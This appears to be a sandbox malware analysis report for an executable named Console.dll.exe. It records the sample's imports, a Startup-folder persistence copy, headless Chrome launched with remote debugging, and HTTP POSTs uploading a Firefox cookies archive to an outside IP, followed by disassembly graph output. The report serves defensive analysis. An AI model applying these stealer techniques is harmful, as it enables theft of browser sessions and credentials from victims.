                                                                                                                                                                                                                        OLEAUT32.dllSafeArrayPutElement, LoadRegTypeLib, CreateErrorInfo, SafeArraySetRecordInfo, GetRecordInfoFromTypeInfo, SafeArrayGetElemsize, SysStringByteLen, SafeArrayAllocDescriptorEx, SysAllocStringByteLen, VarCyFromDec, SafeArrayCreateVector, SysFreeString, VariantInit, GetErrorInfo, SetErrorInfo, SysStringLen, SysAllocString, VariantClear, SysAllocStringLen, SafeArrayGetDim, SafeArrayGetLBound, SafeArrayAllocData, SafeArrayDestroy, QueryPathOfRegTypeLib, VariantChangeTypeEx, LoadTypeLibEx, VariantChangeType, SafeArrayGetVartype
                                                                                                                                                                                                                        USER32.dllLoadStringW, MessageBoxW
                                                                                                                                                                                                                        SHELL32.dllShellExecuteW
                                                                                                                                                                                                                        api-ms-win-crt-string-l1-1-0.dllstrncat_s, wcsncat_s, _stricmp, wcsnlen, wcscat_s, towupper, iswascii, _strdup, strnlen, wcstok_s, isdigit, isalpha, towlower, iswupper, strncpy, isspace, strtok_s, strcmp, _strnicmp, isupper, iswspace, toupper, _wcsdup, tolower, wcsncmp, islower, strncmp, strcspn, strncpy_s, __strncnt, _wcsnicmp, strlen, wcscpy_s, wcsncpy_s, _wcsicmp, strcpy_s, strcat_s
                                                                                                                                                                                                                        api-ms-win-crt-stdio-l1-1-0.dll__stdio_common_vfwprintf, fflush, fputws, fputwc, __acrt_iob_func, __stdio_common_vswprintf, _set_fmode, _get_stream_buffer_pointers, _fseeki64, fread, fsetpos, ungetc, fgetpos, __stdio_common_vsscanf, fgetc, fputc, _wfsopen, fclose, fgets, _wfopen, __p__commode, setvbuf, _setmode, _dup, _fileno, ftell, fseek, __stdio_common_vsnprintf_s, __stdio_common_vfprintf, fputs, __stdio_common_vsnwprintf_s, fwrite, _flushall, fopen, __stdio_common_vsprintf_s
                                                                                                                                                                                                                        api-ms-win-crt-runtime-l1-1-0.dll_invalid_parameter_noinfo_noreturn, abort, exit, _beginthreadex, terminate, _initialize_onexit_table, _register_onexit_function, _crt_atexit, _cexit, _seh_filter_exe, _set_app_type, _wcserror_s, _configure_wide_argv, _initialize_wide_environment, _get_initial_wide_environment, _initterm, _initterm_e, _exit, _errno, __p___argc, __p___wargv, _c_exit, _register_thread_local_exe_atexit_callback, _invalid_parameter_noinfo, _controlfp_s
                                                                                                                                                                                                                        api-ms-win-crt-convert-l1-1-0.dll_wcstoui64, _itow_s, _ltow_s, wcstoul, strtoul, strtoull, _wtoi, atol, atoi
                                                                                                                                                                                                                        api-ms-win-crt-heap-l1-1-0.dllrealloc, free, _set_new_mode, malloc, calloc
                                                                                                                                                                                                                        api-ms-win-crt-utility-l1-1-0.dllqsort
                                                                                                                                                                                                                        api-ms-win-crt-math-l1-1-0.dllasinh, asinhf, atanhf, cbrtf, acoshf, log2f, __libm_sse2_asin, __libm_sse2_atan, __libm_sse2_atan2, __libm_sse2_log10, __libm_sse2_pow, acosh, atanh, log2, __libm_sse2_sin, __libm_sse2_tan, _libm_sse2_acos_precise, _libm_sse2_asin_precise, _libm_sse2_atan_precise, _fdopen, _libm_sse2_cos_precise, _libm_sse2_exp_precise, trunc, truncf, ilogb, ilogbf, _finite, _libm_sse2_log10_precise, _libm_sse2_log_precise, _libm_sse2_pow_precise, _libm_sse2_sin_precise, __libm_sse2_acos, frexp, _CItanh, _CIsinh, _libm_sse2_sqrt_precise, _libm_sse2_tan_precise, ceil, _CIfmod, floor, fma, fmaf, __libm_sse2_cos, _CIcosh, cbrt, _CIatan2, __libm_sse2_exp, _ldclass, _dclass, modf, _isnan, __setusermatherr, __libm_sse2_log, _copysign
                                                                                                                                                                                                                        api-ms-win-crt-time-l1-1-0.dll_gmtime64_s, _time64, wcsftime
                                                                                                                                                                                                                        api-ms-win-crt-environment-l1-1-0.dllgetenv
                                                                                                                                                                                                                        api-ms-win-crt-locale-l1-1-0.dll___mb_cur_max_func, ___lc_codepage_func, ___lc_locale_name_func, __pctype_func, setlocale, localeconv, _configthreadlocale, _unlock_locales, _lock_locales
                                                                                                                                                                                                                        api-ms-win-crt-filesystem-l1-1-0.dll_unlock_file, _wremove, _wrename, _lock_file

                                                                                                                                                                                                                        Exports

                                                                                                                                                                                                                        NameOrdinalAddress
                                                                                                                                                                                                                        CLRJitAttachState30xa83dfc
                                                                                                                                                                                                                        DotNetRuntimeInfo40xa78650
                                                                                                                                                                                                                        MetaDataGetDispenser50x89b4c0
                                                                                                                                                                                                                        g_CLREngineMetrics20xa780cc
                                                                                                                                                                                                                        g_dacTable60x956270

                                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                        Dec 17, 2024 12:03:29.788103104 CET497233000192.168.2.7178.23.190.70
                                                                                                                                                                                                                        Dec 17, 2024 12:03:29.908014059 CET300049723178.23.190.70192.168.2.7
                                                                                                                                                                                                                        Dec 17, 2024 12:03:29.908231974 CET497233000192.168.2.7178.23.190.70
                                                                                                                                                                                                                        Dec 17, 2024 12:03:29.913108110 CET497233000192.168.2.7178.23.190.70
                                                                                                                                                                                                                        Dec 17, 2024 12:03:30.033010006 CET300049723178.23.190.70192.168.2.7
                                                                                                                                                                                                                        Dec 17, 2024 12:03:51.866507053 CET300049723178.23.190.70192.168.2.7
                                                                                                                                                                                                                        Dec 17, 2024 12:03:51.866638899 CET497233000192.168.2.7178.23.190.70
                                                                                                                                                                                                                        Dec 17, 2024 12:03:51.869051933 CET497233000192.168.2.7178.23.190.70
                                                                                                                                                                                                                        Dec 17, 2024 12:03:51.988785028 CET300049723178.23.190.70192.168.2.7
                                                                                                                                                                                                                        Dec 17, 2024 12:04:08.362018108 CET498163000192.168.2.7178.23.190.70
                                                                                                                                                                                                                        Dec 17, 2024 12:04:08.482363939 CET300049816178.23.190.70192.168.2.7
                                                                                                                                                                                                                        Dec 17, 2024 12:04:08.482695103 CET498163000192.168.2.7178.23.190.70
                                                                                                                                                                                                                        Dec 17, 2024 12:04:08.488152981 CET498163000192.168.2.7178.23.190.70
                                                                                                                                                                                                                        Dec 17, 2024 12:04:08.608242035 CET300049816178.23.190.70192.168.2.7
                                                                                                                                                                                                                        Dec 17, 2024 12:04:30.383389950 CET300049816178.23.190.70192.168.2.7
                                                                                                                                                                                                                        Dec 17, 2024 12:04:30.383495092 CET498163000192.168.2.7178.23.190.70
                                                                                                                                                                                                                        Dec 17, 2024 12:04:30.392596006 CET498163000192.168.2.7178.23.190.70
                                                                                                                                                                                                                        Dec 17, 2024 12:04:30.512363911 CET300049816178.23.190.70192.168.2.7

                                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                                        • 178.23.190.70:3000

                                                                                                                                                                                                                        HTTP Packets

                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        0192.168.2.749723178.23.190.7030003736C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 17, 2024 12:03:29.913108110 CET1099OUTPOST /madbruh HTTP/1.1
                                                                                                                                                                                                                        Host: 178.23.190.70:3000
                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary="cf72a99c-b923-4f30-8451-720f2653c718"
                                                                                                                                                                                                                        Content-Length: 942
                                                                                                                                                                                                                        Data Raw: 2d 2d 63 66 37 32 61 39 39 63 2d 62 39 32 33 2d 34 66 33 30 2d 38 34 35 31 2d 37 32 30 66 32 36 35 33 63 37 31 38 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 6d 75 6c 74 69 70 61 72 74 2f 66 6f 72 6d 2d 64 61 74 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 66 69 6c 65 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 38 38 37 38 34 39 20 2d 20 46 49 52 45 46 4f 58 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 38 38 37 38 34 39 25 32 30 2d 25 32 30 46 49 52 45 46 4f 58 2e 7a 69 70 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 08 00 2d 1d 45 57 7e f4 33 af 0e 02 00 00 00 80 01 00 27 00 00 00 66 75 37 77 6e 65 72 33 2e 64 65 66 61 75 6c 74 2d 72 65 6c 65 61 73 65 5c 63 6f 6f 6b 69 65 73 2e 73 71 6c 69 74 65 ed d3 4d 8b d3 40 18 00 e0 b4 2b 2a a2 e7 bd 0e ec 41 85 22 8a 78 b7 ab 51 8b b5 d5 7e 80 9e 96 58 a3 1b ed 36 dd 24 f5 0b c4 05 c1 ff e5 3f f0 9f 78 f5 68 ba ee 2e 55 17 bd e9 c1 e7 81 19 66 e6 1d 26 6f de 4c 86 0f ba [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: --cf72a99c-b923-4f30-8451-720f2653c718Content-Type: multipart/form-dataContent-Disposition: form-data; name=file; filename="887849 - FIREFOX.zip"; filename*=utf-8''887849%20-%20FIREFOX.zipPK-EW~3'fu7wner3.default-release\cookies.sqliteM@+*A"xQ~X6$?xh.Uf&oLYyTj5(Z;hu;8k5}}yJO$_di2lQFnVB$tzv<{p7~y=f*9B_qn(?d'd8oeu0'0}=7liRV$-(ViRelGf0,VT?6Uq]tVa[SfUz\H^.'qp4h*/f"K<upaY^_|F#fOc+YT|km]YwB[v{~@ogoPK-EW~3'fu7wner3.default-release\cookies.sqlitePKUS--cf72a99c-b923-4f30-8451-720f2653c718--


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        1192.168.2.749816178.23.190.7030007728C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 17, 2024 12:04:08.488152981 CET1099OUTPOST /madbruh HTTP/1.1
                                                                                                                                                                                                                        Host: 178.23.190.70:3000
                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary="2ed6c9c2-d5ec-4f22-af34-f4f2547d48c9"
                                                                                                                                                                                                                        Content-Length: 942
                                                                                                                                                                                                                        Data Raw: 2d 2d 32 65 64 36 63 39 63 32 2d 64 35 65 63 2d 34 66 32 32 2d 61 66 33 34 2d 66 34 66 32 35 34 37 64 34 38 63 39 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 6d 75 6c 74 69 70 61 72 74 2f 66 6f 72 6d 2d 64 61 74 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 66 69 6c 65 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 38 38 37 38 34 39 20 2d 20 46 49 52 45 46 4f 58 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 38 38 37 38 34 39 25 32 30 2d 25 32 30 46 49 52 45 46 4f 58 2e 7a 69 70 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 08 00 2d 1d 45 57 7e f4 33 af 0e 02 00 00 00 80 01 00 27 00 00 00 66 75 37 77 6e 65 72 33 2e 64 65 66 61 75 6c 74 2d 72 65 6c 65 61 73 65 5c 63 6f 6f 6b 69 65 73 2e 73 71 6c 69 74 65 ed d3 4d 8b d3 40 18 00 e0 b4 2b 2a a2 e7 bd 0e ec 41 85 22 8a 78 b7 ab 51 8b b5 d5 7e 80 9e 96 58 a3 1b ed 36 dd 24 f5 0b c4 05 c1 ff e5 3f f0 9f 78 f5 68 ba ee 2e 55 17 bd e9 c1 e7 81 19 66 e6 1d 26 6f de 4c 86 0f ba [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: --2ed6c9c2-d5ec-4f22-af34-f4f2547d48c9Content-Type: multipart/form-dataContent-Disposition: form-data; name=file; filename="887849 - FIREFOX.zip"; filename*=utf-8''887849%20-%20FIREFOX.zipPK-EW~3'fu7wner3.default-release\cookies.sqliteM@+*A"xQ~X6$?xh.Uf&oLYyTj5(Z;hu;8k5}}yJO$_di2lQFnVB$tzv<{p7~y=f*9B_qn(?d'd8oeu0'0}=7liRV$-(ViRelGf0,VT?6Uq]tVa[SfUz\H^.'qp4h*/f"K<upaY^_|F#fOc+YT|km]YwB[v{~@ogoPK-EW~3'fu7wner3.default-release\cookies.sqlitePKUS--2ed6c9c2-d5ec-4f22-af34-f4f2547d48c9--


                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                        Start time:06:03:20
                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\Console.dll.exe"
                                                                                                                                                                                                                        Imagebase:0xfc0000
                                                                                                                                                                                                                        File size:77'426'070 bytes
                                                                                                                                                                                                                        MD5 hash:3DABBDB09892B980B8B48DEEEC718E63
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                        Start time:06:03:25
                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless --user-data-dir="C:\Users\user\AppData\Local\google\chrome\User Data"
                                                                                                                                                                                                                        Imagebase:0x7ff6c4390000
                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                        Start time:06:03:26
                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1728 --field-trial-handle=1436,i,4566748188218501428,17155313862400760302,262144 --disable-features=PaintHolding /prefetch:8
                                                                                                                                                                                                                        Imagebase:0x7ff6c4390000
                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                        Start time:07:11:10
                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe"
                                                                                                                                                                                                                        Imagebase:0x490000
                                                                                                                                                                                                                        File size:77'426'070 bytes
                                                                                                                                                                                                                        MD5 hash:3DABBDB09892B980B8B48DEEEC718E63
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                        Start time:07:11:11
                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless --user-data-dir="C:\Users\user\AppData\Local\google\chrome\User Data"
                                                                                                                                                                                                                        Imagebase:0x7ff6c4390000
                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                        Start time:07:11:12
                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1788 --field-trial-handle=1528,i,11531674968129144497,11491206366923448469,262144 --disable-features=PaintHolding /prefetch:8
                                                                                                                                                                                                                        Imagebase:0x7ff6c4390000
                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:10.7%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:31.2%
                                                                                                                                                                                                                          Signature Coverage:8.7%
                                                                                                                                                                                                                          Total number of Nodes:1069
                                                                                                                                                                                                                          Total number of Limit Nodes:19
                                                                                                                                                                                                                          execution_graph 66293 14148e0 66300 ffe830 66293->66300 66297 1414a35 LeaveCriticalSection 66299 1414a5e Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66297->66299 66298 14149b6 66298->66297 66302 ffe87a Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66300->66302 66305 ffe853 66300->66305 66301 ffe8b8 EnterCriticalSection 66303 ffe8dd 66301->66303 66304 ffe8c6 66301->66304 66302->66301 66303->66298 66308 14ab398 66303->66308 66304->66303 66312 115dbc0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66304->66312 66305->66302 66311 115dfb0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66305->66311 66313 1215de0 66308->66313 66311->66302 66312->66303 66314 1215e09 RtlFreeHeap 66313->66314 66315 1215e18 66313->66315 66314->66315 66315->66298 66316 1114630 66337 1114680 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66316->66337 66318 1115047 66319 1115076 66414 1219250 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66319->66414 66322 1114ff4 66403 14ab38a 66322->66403 66323 1114c72 HeapFree 66323->66337 66324 1114ca3 66324->66322 66325 1215d50 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 2 API calls 66324->66325 66328 111504e 66324->66328 66329 1114cfc Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66324->66329 66327 1114d14 66325->66327 66327->66328 66327->66329 66410 1219530 66328->66410 66350 1151b90 GetProcessHeap RtlAllocateHeap RaiseException Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66329->66350 66331 1114d7d 66333 1114e43 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66331->66333 66397 1151b40 GetProcessHeap RtlAllocateHeap RaiseException Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66331->66397 66348 1114eee Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66333->66348 66400 1151b90 GetProcessHeap RtlAllocateHeap RaiseException Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66333->66400 66334 105b3a0 381 API calls 66334->66337 66337->66319 66337->66322 66337->66323 66337->66324 66337->66334 66362 ff3d40 66337->66362 66338 1114ded 66398 1151b40 GetProcessHeap RtlAllocateHeap RaiseException Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66338->66398 66339 1114e8b 66401 1151b90 GetProcessHeap RtlAllocateHeap RaiseException Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66339->66401 66341 1114e0e 66399 1115080 RaiseException Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66341->66399 66344 1114eac Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66402 11154c0 386 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66344->66402 66347 1114fe5 HeapFree 66347->66322 66351 1151be0 66348->66351 66350->66331 66352 1151c14 66351->66352 66353 1151c3d 66351->66353 66352->66353 66354 1151c1a 66352->66354 66415 1151af0 66353->66415 66356 1151af0 RtlFreeHeap 66354->66356 66357 1151c28 66356->66357 66358 1114fcb 66357->66358 66359 1151af0 RtlFreeHeap 66357->66359 66358->66322 66358->66347 66360 1151c72 66359->66360 66360->66358 66361 1151c7c RtlFreeHeap 66360->66361 66361->66358 66363 ff3d90 66362->66363 66371 ff3dcb Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66363->66371 66424 10a2f30 381 API calls 2 library calls 66363->66424 66365 ff427c 66366 14ab38a _ValidateLocalCookies 5 API calls 66365->66366 66367 ff429c 66366->66367 66367->66337 66368 ff4274 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66419 1017660 66368->66419 66369 ff41e3 66369->66365 66369->66368 66371->66365 66371->66368 66371->66369 66372 ff3f91 66371->66372 66373 ff3fad 66371->66373 66374 ff3f59 strncpy_s 66371->66374 66372->66373 66376 ff3f9d strncat_s 66372->66376 66377 ff4070 66373->66377 66425 1003010 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66373->66425 66374->66373 66375 ff3f6c 66374->66375 66375->66373 66379 ff3f78 strncat_s 66375->66379 66376->66373 66426 105e800 381 API calls 2 library calls 66377->66426 66379->66372 66379->66373 66380 ff42e3 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66382 ff4528 66380->66382 66383 ff4405 66380->66383 66386 ff4377 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66380->66386 66384 ff3d40 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 378 API calls 66382->66384 66385 fd2c60 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 378 API calls 66383->66385 66384->66386 66385->66386 66386->66337 66387 ff40ff 66389 ff4141 66387->66389 66428 115dfb0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66387->66428 66388 ff408d 66388->66387 66427 115dbc0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66388->66427 66429 fcfef0 66389->66429 66393 ff4150 66393->66368 66396 ff417a Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66393->66396 66436 1045b90 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66393->66436 66395 fcfef0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 378 API calls 66395->66369 66396->66395 66397->66338 66398->66341 66399->66333 66400->66339 66401->66344 66402->66348 66404 14ab392 66403->66404 66405 14ab393 IsProcessorFeaturePresent 66403->66405 66404->66318 66407 14ab716 66405->66407 66448 14ab6d9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 66407->66448 66409 14ab7f9 66409->66318 66411 1219539 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66410->66411 66412 14b061b Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock RaiseException 66411->66412 66413 121954f 66412->66413 66416 1151b2e 66415->66416 66417 1151afe 66415->66417 66416->66357 66417->66416 66418 1151b0e RtlFreeHeap 66417->66418 66418->66417 66437 1215ca0 66419->66437 66421 1017699 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66443 14b061b 66421->66443 66423 1017742 66424->66371 66425->66377 66426->66388 66427->66387 66428->66389 66430 fcff1a 66429->66430 66431 fcff46 66429->66431 66432 fcff61 66430->66432 66446 115dbc0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66430->66446 66431->66432 66447 115dfb0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66431->66447 66432->66393 66435 fcff37 66435->66393 66436->66396 66438 1215cc4 RtlAllocateHeap 66437->66438 66439 1215cac GetProcessHeap 66437->66439 66440 1215cd4 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66438->66440 66439->66438 66440->66421 66441 14b061b Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock RaiseException 66440->66441 66442 121954f 66441->66442 66444 14b0662 RaiseException 66443->66444 66445 14b0635 66443->66445 66444->66423 66445->66444 66446->66435 66447->66432 66448->66409 66285 1151a00 66286 1151a14 66285->66286 66287 1151a19 66286->66287 66289 1215d50 66286->66289 66290 1215d96 RtlAllocateHeap 66289->66290 66291 1215d7e GetProcessHeap 66289->66291 66292 1215da6 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66290->66292 66291->66290 66292->66287 66453 1250060 66454 12500c5 SetThreadDescription 66453->66454 66455 12500d1 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66454->66455 66456 12500d5 66455->66456 66458 12500dc Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66455->66458 66477 122a2f0 382 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66456->66477 66466 12500f9 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66458->66466 66478 122a520 66458->66478 66460 12501b6 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66461 125014c 66464 1250159 66461->66464 66465 125015b GetCurrentThreadId 66461->66465 66462 125013e 66486 1236a30 385 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66462->66486 66464->66460 66490 1236720 LeaveCriticalSection SleepEx Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66464->66490 66468 1250170 66465->66468 66469 125018e 66465->66469 66466->66460 66466->66461 66466->66462 66467 1250144 66467->66461 66470 1250181 WaitForSingleObject 66468->66470 66487 1236720 LeaveCriticalSection SleepEx Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66468->66487 66471 125019a 66469->66471 66488 1236720 LeaveCriticalSection SleepEx Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66469->66488 66470->66471 66489 124faf0 402 API calls 2 library calls 66471->66489 66476 125017c 66476->66470 66477->66458 66479 122a53b 66478->66479 66485 122a5cd Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66478->66485 66481 122a565 66479->66481 66479->66485 66491 1229e20 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66479->66491 66482 122a5bf 66481->66482 66481->66485 66492 1229920 HeapAlloc Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66482->66492 66484 122a5c7 66484->66485 66485->66466 66486->66467 66487->66476 66488->66471 66489->66464 66490->66460 66491->66481 66492->66484 67621 1091960 67627 10919b6 67621->67627 67642 10919ac 67621->67642 67622 14ab38a _ValidateLocalCookies 5 API calls 67623 1091efa 67622->67623 67624 1091f00 67664 1219250 381 API calls 